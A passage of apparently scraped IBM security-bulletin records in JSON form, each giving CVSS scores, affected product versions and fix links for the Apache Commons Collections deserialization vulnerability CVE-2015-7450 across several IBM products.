\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SPSS Analytic Server 1.0.1, 2.0 and 2.1\n\n## Remediation/Fixes\n\n_Product_| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nSPSS Analytic Server| 2.1| [IBM SPSS Analytic Server 2.1.0.1 interim fix](<http://www.ibm.com/support/docview.wss?uid=swg24041420>) \nSPSS Analytic Server| 2.0| [IBM SPSS Analytic Server 2.0.0.1 interim fix](<http://www.ibm.com/support/docview.wss?uid=swg24041309>) \nSPSS Analytic Server| 1.0.1| [IBM SPSS Analytic Server 1.0.1 interim fix](<http://www.ibm.com/support/docview.wss?uid=swg24041366>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T13:37:22", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in bundled components affects IBM SPSS Analytic Server (CVE-2015-7450).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T13:37:22", "id": "62D0C5029A2EB3B354943CD5E9012311F875BACCD6A1D9F54159F910BD37F9CA", "href": "https://www.ibm.com/support/pages/node/272897", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T17:46:07", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise.\n\n## Vulnerability Details\n\nIBM Business Process Manager and IBM Tivoli System Automation Application Manager are shipped with both IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise. IBM SmartCloud Cost Management and IBM Tivoli Monitoring supporting products are shipped with IBM Cloud Orchestrator Enterprise. \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Principal Product and Versions**| **Affected Supporting Product and Version** \n---|--- \nIBM Cloud Orchestrator V2.5, V2.5.0.1| IBM Business Process Manager Standard V8.5.6; IBM Tivoli System Automation Application Manager V4.1 \nIBM Cloud Orchestrator Enterprise V2.5, V2.5.0.1| IBM Business Process Manager Standard V8.5.6; IBM Tivoli System Automation Application Manager V4.1; IBM SmartCloud Cost Management V2.1.0.4; IBM Tivoli Monitoring 6.3.0.2 \nIBM Cloud Orchestrator V2.4, V2.4.0.1, V2.4.0.2 and V2.4.0.2 Interim Fix1| IBM Business Process Manager Standard V8.5.0.1; IBM Tivoli System Automation Application Manager V4.1 \nIBM Cloud Orchestrator Enterprise V2.4, V2.4.0.1, V2.4.0.2 and V2.4.0.2 Interim Fix1| IBM Business Process Manager Standard V8.5.0.1; IBM Tivoli System Automation Application Manager V4.1; IBM SmartCloud Cost Management V2.1.0.4; IBM Tivoli Monitoring V6.3.0.2 \n \n## Remediation/Fixes\n\nThe recommended solution is to apply the fixes as soon as practical. Please see below for information on the fixes available. \n \nIf you are running IBM Cloud Orchestrator V2.5.0.1, upgrade to [**IBM Cloud Orchestrator V2.5.0.1 Interim Fix 1 for V2.5.0.1**](<http://www.ibm.com/support/docview.wss?uid=swg2C4000021>) or later. 
\n\nIf you are running IBM Cloud Orchestrator V2.4, V2.4.0.1, V2.4.0.2 or V2.4.0.2 Interim Fix1, upgrade to **IBM Cloud Orchestrator V2.4 Fix Pack 3 (2.4.0.3)** or later.\n\nFor affected supporting products shipped with IBM Cloud Orchestrator, consult the security bulletins below for vulnerability details and apply fixes as appropriate depending on your environment.\n\n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager| 8.5.0.1, 8.5.6| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21882528>) \n \nIf you are running IBM Cloud Orchestrator Enterprise V2.5.0.1, upgrade to [**IBM Cloud Orchestrator Enterprise V2.5.0.1 Interim Fix 1 for V2.5.0.1**](<http://www.ibm.com/support/docview.wss?uid=swg2C4000021>) or later. 
\n\nIf you are running IBM Cloud Orchestrator Enterprise V2.4, V2.4.0.1, V2.4.0.2 or V2.4.0.2 Interim Fix1, upgrade to [**IBM Cloud Orchestrator Enterprise V2.4 Fix Pack 3 (2.4.0.3) or later**](<http://www.ibm.com/support/docview.wss?uid=swg24040281>).\n\nFor affected supporting products shipped with IBM Cloud Orchestrator Enterprise, consult the security bulletins below for vulnerability details and apply fixes as appropriate depending on your environment.\n\n**Affected Supporting Product**| **Version**| **Remediation/First Fix** \n---|---|--- \nIBM Business Process Manager| 8.5.0.1, 8.5.6| [_Security Bulletin: Multiple vulnerabilities in IBM Business Process Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21882542>) \nIBM Tivoli System Automation Application Manager| 4.1| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli System Automation Application Manager shipped with IBM Cloud Orchestrator and IBM SmartCloud Orchestrator (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21882528>) \nIBM SmartCloud Cost Management| 2.1.0.4| [_Security Bulletin: A security vulnerability in IBM SmartCloud Cost Management shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21883102>) \nIBM Tivoli Monitoring| 6.3.0.2| [_Security Bulletin: Multiple vulnerabilities in IBM Tivoli Monitoring shipped with IBM Cloud Orchestrator Enterprise and IBM SmartCloud Orchestrator Enterprise (CVE-2015-7450)_](<http://www.ibm.com/support/docview.wss?uid=swg21883331>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": 
{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:51", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Cloud Orchestrator, IBM Cloud Orchestrator Enterprise, and products shipped with IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:32:51", "id": "EB641991DE825481AC6F76AA1698D9687D265C328B6AD66B3DD9CED1ECBD64C6", "href": "https://www.ibm.com/support/pages/node/599159", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:56:15", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Worklight and IBM MobileFirst Platform Foundation.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n * IBM Worklight Consumer Edition Versions 6.0.0.0, 6.0.0.1 and 6.0.0.2\n * IBM Worklight Enterprise Edition Versions 6.0.0.0, 6.0.0.1 and 6.0.0.2\n * IBM Worklight Consumer Edition Versions 6.1.0.0, 6.1.0.1 and 6.1.0.2\n * IBM Worklight Enterprise Edition Versions 6.1.0.0, 6.1.0.1 and 6.1.0.2\n * IBM Mobile Foundation Consumer Edition Version 6.2.0.0 and 6.2.0.1\n * IBM Mobile Foundation Enterprise Edition Version 6.2.0.0 and 6.2.0.1\n * IBM MobileFirst Platform Foundation Version 6.3.0.0\n * IBM MobileFirst Platform Foundation Version 7.0.0.0\n * IBM MobileFirst Platform Foundation Version 7.1.0.0\n\n## Remediation/Fixes\n\n**Product**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nIBM Worklight| 6.x| [PI53527](<http://www.ibm.com/support/docview.wss?uid=swg1PI53527>)| Download the latest iFix for [IBM Worklight Enterprise Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Worklight+Enterprise+Edition&release=All&platform=All&function=all&source=fc>) or for [IBM Worklight Consumer Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Worklight+Consumer+Edition&release=All&platform=All&function=all&source=fc>) \nIBM Mobile Foundation| 6.x| | Download the latest iFix for [IBM Mobile Foundation Enterprise Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Mobile+Foundation+Enterprise+Edition&release=All&platform=All&function=all&source=fc>) or for [IBM Mobile Foundation Consumer Edition on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+Mobile+Foundation+Enterprise+Edition&release=All&platform=All&function=all&source=fc>) \nIBM MobileFirst Platform Foundation| 6.x and 7.x| | Download the latest iFix for [IBM MobileFirst Platform Foundation on FixCentral](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/IBM+MobileFirst+Platform+Foundation&release=All&platform=All&function=all&source=fc>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:49", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Worklight and IBM MobileFirst Platform Foundation (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 
10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:32:49", "id": "5643D4C6424A9348BB845C3E966C5F250F9408B6256677E84122FA5CB87AD0D5", "href": "https://www.ibm.com/support/pages/node/619223", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:51:56", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM QRadar SIEM and IBM QRadar Incident Forensics.\n\n## Vulnerability Details\n\n**CVE-ID:** [_CVE-2015-7450_](<http://security:responder@cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n * IBM QRadar 7.1 MR2\n * IBM QRadar 7.2._n_\n\n## Remediation/Fixes\n\n * [_IBM QRadar SIEM 7.1 MR2 Patch 12_](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=Security%2BSystems&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.1.0&platform=Linux&function=fixId&fixids=7.1.0-QRADAR-QRSIEM-1104434&includeRequisites=1&includeSupersedes=0&downloadMethod=http>)\n * [_IBM QRadar/QRM/QVM/QRIF 7.2.6 Patch 1_](<http://www-933.ibm.com/support/fixcentral/swg/downloadFixes?parent=Security%2BSystems&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=7.2.0&platform=All&function=fixId&fixids=7.2.6-QRADAR-QRSIEM-20160106113021&includeRequisites=0&includeSupersedes=0&downloadMethod=http>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:38:45", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons could affect IBM QRadar SIEM and IBM QRadar Incident Forensics. 
(CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:38:45", "id": "BE33FF3D128A47BAA318647372B1DA087A9A75A57BFD9EBAD86942F489DE4463", "href": "https://www.ibm.com/support/pages/node/540235", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:40:05", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is used by the IBM Rational ClearQuest server and web components. Information about a security vulnerability affecting WAS has been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section.\n\n## Affected Products and Versions\n\nIBM Rational ClearQuest, ClearQuest CM Server component.\n\n**Versions 9.0.1.x:**\n\nThis vulnerability only applies to the server component, and only for certain levels of WebSphere Application Server.\n\n## Remediation/Fixes\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS), which is shipped with IBM Rational ClearQuest.\n\n**Principal Product and Version(s)** | **Affected Supporting Product and Version** | **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearQuest, versions 9.0.1.x | IBM WebSphere Application Server 9.0. 
| [Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>) \n \n**ClearQuest Versions**| **Applying the fix** \n---|--- \n9.0.1.x| \n\n 1. Determine the WAS version used by your CM server. Navigate to the CM profile directory (either the profile you specified when installing ClearQuest, or `<clearquest-home>/cqweb/cqwebprofile`), then execute the script `bin/versionInfo.sh` (UNIX) or `bin\\versionInfo.bat` (Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section.\n 2. Identify the latest available fix (per the bulletin listed above) for the version of WAS used by the CM server.\n 3. Apply the appropriate WebSphere Application Server fix directly to your CM server host. No ClearQuest-specific steps are necessary. \n \n_For 8.0.x, 7.0.x, 7.1.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-03T05:18:16", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server which is used by IBM Rational ClearQuest (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-03T05:18:16", "id": "4243942389BBD88941611BCA76F2DCF167E509F456B0E77C5333EC2CBE4BD595", "href": "https://www.ibm.com/support/pages/node/1115475", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:58", "description": "## Summary\n\nIBM Tivoli Storage Manager FastBack Reporting requires the dependent product IBM WebSphere Application Server. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM Tivoli Storage Manager Fastback 6.1.0 through 6.1.12.1| IBM WebSphere Application Server 8.5.0.1 Full Profile \nIBM Tivoli Storage Manager Fastback 6.1.12.2 through 6.1.12.3| IBM WebSphere Application Server 8.5.5.4 Full Profile \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:34", "type": "ibm", "title": "Security Bulletin: A security vulnerability 
identified in IBM WebSphere Application Server affecting IBM Tivoli Storage Manager FastBack Reporting (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:34", "id": "DB2B818A328E9D978E389CD017B47DF75CF8C64900E023A2B46B5D029C47E02F", "href": "https://www.ibm.com/support/pages/node/272843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:46", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Algo Credit Limits.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Algo Credit Limits 4.7 and earlier\n\n## Remediation/Fixes\n\nA fix has been created for version 4.5.0.05 and 4.7.0.03 of the named product. 
Download and install the fix as soon as practicable. Fix and installation instructions are provided at the URL listed below. \n \n \n\n\nPatch Number| Download URL \n---|--- \nACLM 4.5.0.05 IF6| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.5.0.5-Algo-CreditLimits-if0006-cs:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.5.0.5-Algo-CreditLimits-if0006-cs:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 Solaris/Oracle| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolOra-fp0008:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 Solaris/DB2| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-SolDB2-fp0008:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 RHEL/Oracle| 
[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHESOra-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-RHESOra-fp0008:0&includeSupersedes=0&source=fc&login=true>) \nACLM 4.7.0.03 FP8 AIX/Oracle| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIXOra-fp0008:0&includeSupersedes=0&source=fc&login=true](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+Credit+Manager&release=All&platform=All&function=fixId&fixids=4.7.0.03-Algo-CreditLimits-AIXOra-fp0008:0&includeSupersedes=0&source=fc&login=true>) \n \nFor other versions IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T22:41:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Algo Credit Limits (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T22:41:02", "id": "8A9198697F8388FC75E2DA73A2811AC8903D8787718F479A630B9674D8C0DC03", "href": "https://www.ibm.com/support/pages/node/272175", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:12", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Content Navigator.\n\n## Vulnerability Details\n\n**CVEID: **CVE-2015-7450 \n**DESCRIPTION: **Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
